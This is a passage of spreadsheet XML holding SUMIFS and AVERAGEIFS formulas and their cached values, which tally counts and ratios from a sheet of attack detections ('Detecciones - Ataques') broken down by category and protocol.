        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>5</v>
      </c>
      <c r="Z45" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>17893</v>
      </c>
      <c r="AA45" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>16</v>
      </c>
      <c r="AB45" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>34</v>
      </c>
      <c r="AC45" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>23</v>
      </c>
      <c r="AD45" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>128</v>
      </c>
      <c r="AE45" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>7</v>
      </c>
      <c r="AF45" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>574</v>
      </c>
      <c r="AG45" s="271"/>
      <c r="AH45" s="386" t="s">
        <v>2490</v>
      </c>
      <c r="AI45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>1290</v>
      </c>
      <c r="AJ45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>0</v>
      </c>
      <c r="AK45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>5</v>
      </c>
      <c r="AL45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>1253</v>
      </c>
      <c r="AN45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>103</v>
      </c>
      <c r="AR45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>2</v>
      </c>
      <c r="AS45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>1</v>
      </c>
      <c r="AU45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>3</v>
      </c>
      <c r="AV45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>4</v>
      </c>
      <c r="AW45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>12</v>
      </c>
      <c r="AY45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>1</v>
      </c>
      <c r="BA45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>1</v>
      </c>
      <c r="BD45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>1</v>
      </c>
      <c r="BI45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>4</v>
      </c>
      <c r="BL45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>14784</v>
      </c>
      <c r="BN45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>3108</v>
      </c>
      <c r="BO45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>4</v>
      </c>
      <c r="BT45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>1</v>
      </c>
      <c r="BU45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>4</v>
      </c>
      <c r="BX45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>1</v>
      </c>
      <c r="BZ45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>0</v>
      </c>
      <c r="CA45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>1</v>
      </c>
      <c r="CC45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>2</v>
      </c>
      <c r="CG45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>6</v>
      </c>
      <c r="CL45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>15</v>
      </c>
      <c r="CN45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>3</v>
      </c>
      <c r="CP45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>18</v>
      </c>
      <c r="CQ45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>2</v>
      </c>
      <c r="CR45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>122</v>
      </c>
      <c r="CT45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>4</v>
      </c>
      <c r="CU45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>2</v>
      </c>
      <c r="CY45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>0</v>
      </c>
      <c r="CZ45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>5</v>
      </c>
      <c r="DE45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>2</v>
      </c>
      <c r="DF45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>450</v>
      </c>
      <c r="DI45" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>112</v>
      </c>
      <c r="DJ45" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>12</v>
      </c>
      <c r="DK45" s="271"/>
      <c r="DO45" s="439"/>
      <c r="DP45" s="435" t="s">
        <v>2504</v>
      </c>
      <c r="DQ45" s="427">
        <f t="shared" ref="DQ45:DT45" si="32">DQ43/(DQ43+DQ44)</f>
        <v>0.1304347826</v>
      </c>
      <c r="DR45" s="427">
        <f t="shared" si="32"/>
        <v>0.4347826087</v>
      </c>
      <c r="DS45" s="427">
        <f t="shared" si="32"/>
        <v>0.652173913</v>
      </c>
      <c r="DT45" s="427">
        <f t="shared" si="32"/>
        <v>0.6956521739</v>
      </c>
      <c r="DU45" s="441"/>
      <c r="DV45" s="271"/>
      <c r="DW45" s="435" t="s">
        <v>2505</v>
      </c>
      <c r="DX45" s="443">
        <f t="shared" ref="DX45:EA45" si="33">DX43/(DX43+DX44)</f>
        <v>0.1081081081</v>
      </c>
      <c r="DY45" s="443">
        <f t="shared" si="33"/>
        <v>0.3243243243</v>
      </c>
      <c r="DZ45" s="443">
        <f t="shared" si="33"/>
        <v>0.5135135135</v>
      </c>
      <c r="EA45" s="443">
        <f t="shared" si="33"/>
        <v>0.5540540541</v>
      </c>
      <c r="EB45" s="437"/>
      <c r="EC45" s="271"/>
      <c r="ED45" s="280"/>
      <c r="EG45" s="279"/>
      <c r="EH45" s="271"/>
      <c r="EI45" s="271"/>
      <c r="EJ45" s="271"/>
      <c r="EK45" s="271"/>
      <c r="EL45" s="271"/>
      <c r="EM45" s="271"/>
      <c r="EN45" s="271"/>
      <c r="EO45" s="271"/>
      <c r="EP45" s="271"/>
      <c r="EQ45" s="271"/>
      <c r="ER45" s="271"/>
      <c r="ES45" s="271"/>
      <c r="ET45" s="271"/>
      <c r="EU45" s="271"/>
      <c r="EV45" s="271"/>
      <c r="EW45" s="432"/>
      <c r="EX45" s="432"/>
      <c r="EY45" s="432"/>
      <c r="EZ45" s="432"/>
      <c r="FA45" s="367"/>
      <c r="FC45" s="281" t="s">
        <v>2506</v>
      </c>
      <c r="FD45" s="221"/>
      <c r="FE45" s="221"/>
      <c r="FF45" s="221"/>
      <c r="FG45" s="221"/>
      <c r="FH45" s="222"/>
      <c r="FK45" s="324"/>
      <c r="FL45" s="324"/>
      <c r="FM45" s="324"/>
      <c r="FN45" s="324"/>
      <c r="FO45" s="324"/>
      <c r="FP45" s="324"/>
      <c r="FQ45" s="392"/>
      <c r="FR45" s="392"/>
      <c r="FS45" s="392"/>
      <c r="FT45" s="392"/>
      <c r="FU45" s="392"/>
      <c r="FV45" s="392"/>
      <c r="FW45" s="392"/>
      <c r="FX45" s="392"/>
      <c r="FY45" s="392"/>
      <c r="FZ45" s="392"/>
      <c r="GA45" s="392"/>
      <c r="GB45" s="392"/>
      <c r="GC45" s="392"/>
      <c r="GD45" s="392"/>
      <c r="GE45" s="392"/>
      <c r="GF45" s="392"/>
      <c r="GG45" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SMTP")</f>
        <v>SMTP</v>
      </c>
      <c r="GH45" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG45)</f>
        <v>0</v>
      </c>
      <c r="GI45" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG45)</f>
        <v>0</v>
      </c>
      <c r="GJ45" s="373">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG45)</f>
        <v>0</v>
      </c>
      <c r="GK45" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SMTP")</f>
        <v>SMTP</v>
      </c>
      <c r="GL45" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG45)</f>
        <v>0</v>
      </c>
      <c r="GM45" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG45)</f>
        <v>0</v>
      </c>
      <c r="GN45" s="374">
